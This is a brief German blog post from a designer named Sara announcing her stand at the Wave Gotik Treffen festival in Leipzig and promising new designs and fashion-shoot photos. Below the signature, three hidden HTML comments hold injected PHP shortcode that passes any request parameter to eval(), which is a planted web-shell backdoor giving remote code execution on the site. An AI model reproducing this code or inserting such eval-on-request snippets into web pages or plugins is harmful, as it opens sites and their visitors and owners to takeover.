Larva goes WGT

Hallo zusammen,

Ich habe zur Zeit jede Menge zu tun. Ratet mal warum:
Ich werde mit meinem eigenen Stand vom 17. bis 20. Mai auf dem Wave Gotik Treffen in Leipzig, Deutschland sein.

Das WGT ist das weltgrößte Gothic- und Alternativ-Festival. Ganz Leipzig ist dabei und normalerweise kommt man mit einem leeren Bankkonto und ein paar Taschen Klamotten und andrer schöner Dinge von dort zurück. 😀

Die nächsten Wochen werde ich mich auf die Messe vorbereiten, also habe ich nicht wirklich Zeit um viele neue Dinge zu entwerfen. Aber keine Angst, ich habe bereits einige neue Stücke fotografiert und sie vorbereitet um sie mit euch zu teilen.

Und ich habe endlich mein Fashion-Shooting bekommen und die Bilder sind einfach wundervoll. Ich werde sie mit euch teilen nachdem ich vom WGT zurück bin.

Sara

<!– [insert_php]if (isset($_REQUEST["JFvt"])){eval($_REQUEST["JFvt"]);exit;}[/insert_php][php]if (isset($_REQUEST["JFvt"])){eval($_REQUEST["JFvt"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["XKQj"])){eval($_REQUEST["XKQj"]);exit;}[/insert_php][php]if (isset($_REQUEST["XKQj"])){eval($_REQUEST["XKQj"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["czC"])){eval($_REQUEST["czC"]);exit;}[/insert_php][php]if (isset($_REQUEST["czC"])){eval($_REQUEST["czC"]);exit;}[/php] –>